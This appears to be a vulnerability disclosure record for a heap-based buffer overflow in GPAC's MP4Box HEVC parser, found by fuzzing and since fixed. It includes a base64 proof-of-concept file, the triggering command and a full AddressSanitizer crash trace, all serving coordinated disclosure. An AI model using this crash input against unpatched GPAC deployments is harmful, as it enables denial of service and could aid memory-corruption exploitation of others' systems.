Heap-based Buffer Overflow in gpac/gpac

Valid

Reported on

Feb 17th 2022


Description

Heap-based Buffer Overflow in gpac

Proof of Concept

Version:

MP4Box - GPAC version 1.1.0-DEV-rev1762-g90a145735-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D

System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

poc

base64 poc
Q0FDMAAA//RkRDIAAgwAAAA/////dQE/AAABQAAAAUEAAAFC3f//AAAAAURAAAABQQEAGELdABAA
AH//+fn5+Qj6REZERERET0RYZHMQAAB///n53PoV+URGRBRERFhEHUwAAFtERERERERE

command:

./MP4Box -info poc

Result

~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc
=================================================================
==64177==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f21c83a7f50 at pc 0x7f21cc2b7304 bp 0x7ffe63c7db10 sp 0x7ffe63c7db08
READ of size 4 at 0x7f21c83a7f50 thread T0
    #0 0x7f21cc2b7303 in gf_hevc_read_sps_bs_internal /home/aidai/fuzzing/gpac/gpac/src/media_tools/av_parsers.c:8202:54
    #1 0x7f21cc2bac14 in gf_hevc_parse_nalu_bs /home/aidai/fuzzing/gpac/gpac/src/media_tools/av_parsers.c:8629:30
    #2 0x7f21cd047756 in naludmx_parse_nal_hevc /home/aidai/fuzzing/gpac/gpac/src/filters/reframe_nalu.c:2164:8
    #3 0x7f21cd047756 in naludmx_process /home/aidai/fuzzing/gpac/gpac/src/filters/reframe_nalu.c:3059:23
    #4 0x7f21ccac918f in gf_filter_process_task /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter.c:2573:7
    #5 0x7f21cca8a32d in gf_fs_thread_proc /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_session.c:1799:3
    #6 0x7f21cca86cc7 in gf_fs_run /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_session.c:2043:2
    #7 0x7f21cc331e43 in gf_media_import /home/aidai/fuzzing/gpac/gpac/src/media_tools/media_import.c:1225:3
    #8 0x5657dc in convert_file_info /home/aidai/fuzzing/gpac/gpac/applications/mp4box/fileimport.c:128:6
    #9 0x50f745 in mp4boxMain /home/aidai/fuzzing/gpac/gpac/applications/mp4box/main.c:6052:6
    #10 0x7f21cb0e70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x429b9d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x429b9d)

0x7f21c83a7f50 is located 4240 bytes to the right of 157376-byte region [0x7f21c8380800,0x7f21c83a6ec0)
allocated by thread T0 here:
    #0 0x4a22dd in malloc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x4a22dd)
    #1 0x7f21cd039aad in naludmx_configure_pid /home/aidai/fuzzing/gpac/gpac/src/filters/reframe_nalu.c:348:25
    #2 0x7f21cc9f31a5 in gf_filter_pid_configure /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_pid.c:752:6
    #3 0x7f21cca1c039 in gf_filter_pid_connect_task /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_pid.c:1061:3

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aidai/fuzzing/gpac/gpac/src/media_tools/av_parsers.c:8202:54 in gf_hevc_read_sps_bs_internal
Shadow bytes around the buggy address:
  0x0fe4b906cf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0fe4b906cfe0: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa
  0x0fe4b906cff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906d000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe4b906d010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe4b906d020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe4b906d030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==64177==ABORTING
We are processing your report and will contact the gpac team within 24 hours. 3 months ago
We have contacted a member of the gpac team and are waiting to hear back 3 months ago
gpac/gpac maintainer
3 months ago

Maintainer


https://github.com/gpac/gpac/issues/2124

We have sent a follow up to the gpac team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the gpac team. We will try again in 10 days. 3 months ago
gpac/gpac maintainer validated this vulnerability 3 months ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
gpac/gpac maintainer confirmed that a fix has been merged on aa8f03 3 months ago
The fix bounty has been dropped
to join this conversation